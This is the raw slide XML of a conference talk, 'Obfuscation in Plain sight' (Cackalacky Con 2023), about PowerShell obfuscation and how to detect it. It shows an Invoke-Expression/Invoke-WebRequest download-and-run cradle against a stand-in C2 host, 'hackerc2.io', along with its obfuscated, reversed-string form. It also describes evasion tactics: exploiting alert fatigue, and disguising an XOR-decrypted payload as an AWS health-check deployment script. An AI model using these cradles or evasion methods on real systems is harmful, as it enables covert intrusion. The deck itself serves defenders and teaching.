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72" r:id="rId5"/>
    <p:sldId id="278" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="291" r:id="rId10"/>
    <p:sldId id="292" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="276" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="280" r:id="rId17"/>
    <p:sldId id="281" r:id="rId18"/>
    <p:sldId id="283" r:id="rId19"/>
    <p:sldId id="290" r:id="rId20"/>
    <p:sldId id="287" r:id="rId21"/>
    <p:sldId id="293" r:id="rId22"/>
    <p:sldId id="285" r:id="rId23"/>
    <p:sldId id="288" r:id="rId24"/>
    <p:sldId id="294" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="289" r:id="rId27"/>
    <p:sldId id="295" r:id="rId28"/>
    <p:sldId id="299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5C8785-4F6B-3DDC-CCB3-63A8F9AD4CF9}" name="Jonathan Chaipis" initials="JC" userId="f524fbe808390e6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A54F7-6D95-BF4A-8F9A-B4C707D304E1}" v="5" dt="2023-05-07T15:32:03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77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4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6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6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11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7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98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8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45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99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44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19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8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15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1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8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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Meld - graphical representation of the difference between the two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18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9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2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0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6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hisismyhackerc2/ha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DC81-ECDC-2142-3CD5-BA853B60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5251859" cy="132556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Obfuscation in Plain sight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31E7-615D-E98D-0E42-9524BFB8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Edward S &amp; Jonathan C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Cackalacky Con 2023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2537E-1421-5AE3-6836-27BF3B58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63046-7917-CE72-DDE7-B33ACCC6748C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126124" y="57386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7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Invoke Obfuscation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C72B7F-E586-E0DA-2A59-AFD443DA91AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6655419" y="2317089"/>
            <a:ext cx="5199004" cy="3485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So, we can iterate through Invoke-Obfuscation and build string-based detections to lock build rules to find specific strings.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“.( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>psHOMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[4]+$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>psHOMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[34]+'X’)” actually means </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> which means invoke-expression.  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989-05DB-5308-BB68-E5B9D75007F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218114" y="1575901"/>
            <a:ext cx="6376650" cy="174567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Turn This!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Söhne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D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Invoke-expression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(invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>webrequest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“http://hackerc2.io”)</a:t>
            </a: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BFA7A3-75C1-219D-9755-414B7AE23EA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218113" y="3610272"/>
            <a:ext cx="6437305" cy="34855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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Into this!</a:t>
            </a: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SET  ("l"+"s4W")  (  [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[]] "))')”o'+'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'+'.'+'2crekcah//:'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“ '+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tseu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qerbe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'w-e'+'k'+'o'+'v'+'n'+'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( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acsufb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'o'+'-e'+'k'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ovnI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'(()'x'+]31[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DilLEhs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$+]1[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diLLEHs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ ( &amp; "  );  [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ArrAY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reveRse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($ls4W); .( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>psHOMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[4]+$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>psHOMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[34]+'X')( -JoIn$ls4W) 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034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Detection Strategies for Normal Obfuscation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93ED1-7764-A729-5956-56F43D5EC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46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8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Leveraging Alert Fatigue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2E837-9054-C55E-5E9B-8DA88D484D67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="117447" y="1658587"/>
            <a:ext cx="1202981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Let's switch over to the attacker mindset and subvert the defender. We know that this will raise red flags.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"SET  ("l"+"s4W")  (  [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[]] "))')”o'+'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'+'.'+'2crekcah//:'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“ '+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tseu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qerbe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'w-e'+'k'+'o'+'v'+'n'+'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( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acsufb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'o'+'-e'+'k'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ovnI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'(()'x'+]31[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DilLEhs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$+]1[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diLLEHs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ ( &amp; "  );  [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ArrAY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reveRse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($ls4W); .( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>psHOMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[4]+$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>psHOMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[34]+'X')( -JoIn$ls4W)"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So, let's just assume our commands will be alerted to. However, we also know that they would get a lot of similar false positives.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44"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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989-05DB-5308-BB68-E5B9D75007F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223858" y="1236333"/>
            <a:ext cx="4768766" cy="42764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             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  <a:t>PSAppDeployToolkit   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öhne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Parts of a professional/prod non-malicious script:</a:t>
            </a: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  <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Description</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/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  <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>License </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
            </a:b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  <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Author</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Code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goal is to blend-in with legitimate script activity.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03193FD-DC9A-35A4-32F4-F319B6BB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45" y="977317"/>
            <a:ext cx="6881378" cy="58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81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Difficulty of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6F4C-D0A7-7DCB-2312-F046D4A08560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499872" y="1626544"/>
            <a:ext cx="11192256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Background scripting can be very noisy and weaponized by threat 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script and many others have the capacity to effectively bypass Endpoint Detection Response (EDR)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Detection may be more difficult if EDR exclusions are by file or path, opening bigger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L1 analysts may assume this is legitimate activity and flag as false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analyst needs to be aware to look for obfuscated code to know to look for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Defenders need to monitor for different combinations of execution and downloader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0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10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Creating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Non-Malicious looking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Scripts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Hidden Payload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9251D3-1D55-092C-30D8-1114626E2C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259359" y="1416698"/>
            <a:ext cx="5255942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F9EE0D1-072A-91E4-7663-BB14E47B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1235409"/>
            <a:ext cx="4185920" cy="556574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585A2B8-171D-7816-6022-0753A6438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80" y="1235409"/>
            <a:ext cx="7583827" cy="55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Parser Function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9251D3-1D55-092C-30D8-1114626E2C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339243" y="1690688"/>
            <a:ext cx="11304865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This parser function uses regex to get the XOR encrypted payload and puts it into the variable $encrypted.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9D0929AF-60C7-70B4-55DD-0FADCAE2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" y="2957266"/>
            <a:ext cx="11592288" cy="38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Obfuscated Parser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> Function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12CACF-1249-5D69-A1DE-5DD191D37C06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250971" y="1690994"/>
            <a:ext cx="7575958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Here we see it again changing the function name to hide its purpose.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AD7BCDF-5F85-A2C9-DE17-7C202433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2293"/>
            <a:ext cx="12192000" cy="39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Parser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> Function Comparison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AD7BCDF-5F85-A2C9-DE17-7C202433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84" y="4026307"/>
            <a:ext cx="8357075" cy="2711462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68FB8E1-C08B-27A3-E6B6-BC18DEE1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40" y="1266472"/>
            <a:ext cx="8323519" cy="27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2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Decryption Function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96A793-7DBE-C03E-9045-F137D262631F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259358" y="1690688"/>
            <a:ext cx="10246947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This function decrypts the encrypted string, and its true purpose is obvious and in plain sight.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4CA0BEDF-AA7E-4A85-32F4-473B3B93A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3" y="2833883"/>
            <a:ext cx="10390632" cy="40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D057F-C694-AB6D-0601-3A3006B7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EB9A8C-0E0A-AB7C-2619-A3FEC62BEB95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3418514" y="4498328"/>
            <a:ext cx="8535797" cy="204058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Jon Chaipis “Dawn/Dawntouchme”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Lead Incident Responder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Adv Prompt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Blue Teamer that loves Red Teaming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Ed Sabijon “SavvyJuan”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Will do anything for a free T-shirt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Has too many tabs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Professional Bing Searcher</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16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F34D405A-34EA-3632-9B29-CC3BE896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80" y="726085"/>
            <a:ext cx="6439803" cy="3640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CAE33-55EE-B4D0-4443-DD6B46B095AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585043" y="225475"/>
            <a:ext cx="863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Who are we? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>We don’t even know.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32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Obfuscated Decryption Function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B989-05DB-5308-BB68-E5B9D75007F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326472" y="1690688"/>
            <a:ext cx="11344377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Here it is again after renaming the function and changing variables to hide to make it look non-malicious.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236EE24-C7D6-9744-9150-1AFD7E32C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" r="-247"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2916947"/>
            <a:ext cx="12192000" cy="39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5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Decryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> Function Comparison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9366EF9-9ABA-0C3A-D4CD-9050AEBCB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7" b="13475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088858" y="1444521"/>
            <a:ext cx="8052034" cy="2778963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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6732D2BE-A419-F44A-325A-7DD9705A8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" r="677" b="13833"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051108" y="4298273"/>
            <a:ext cx="8089784" cy="22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7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Creating Fake Deployment Scripts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Execution Function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1DC2F8-9E57-FFB0-8C68-2332E713BED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294663" y="1788918"/>
            <a:ext cx="11602674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This is where we set our variables and grab the fake PEM key and run the other two functions and execute the decrypted payload.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D618A91-1C5A-164A-92C8-3B961E65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0661"/>
            <a:ext cx="12192000" cy="36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7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Creating Fake Deployment Scripts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Obfuscated Execution Function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1DC2F8-9E57-FFB0-8C68-2332E713BED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240931" y="2060007"/>
            <a:ext cx="11710137" cy="4276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Söhne"/>
              </a:rPr>
              <a:t>Here it is again but we make it look like we are initiating a health check for AWS.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A486764D-EDC2-421D-EC25-7B79A3D9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791"/>
            <a:ext cx="12192000" cy="27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Creating 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Non-Malicious looking Scripts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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</a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> Function Comparison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FCFB938-A895-74C0-F3C6-54E96478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9" y="1399466"/>
            <a:ext cx="9400051" cy="2788974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 10" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB31563-FD43-D1A4-E538-EE30D7E55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" y="4232246"/>
            <a:ext cx="10707522" cy="24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5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Creating Non-Malicious looking Scripts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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Putting it all together!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344BE-B747-A6B0-EECE-E81D1D53A0C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
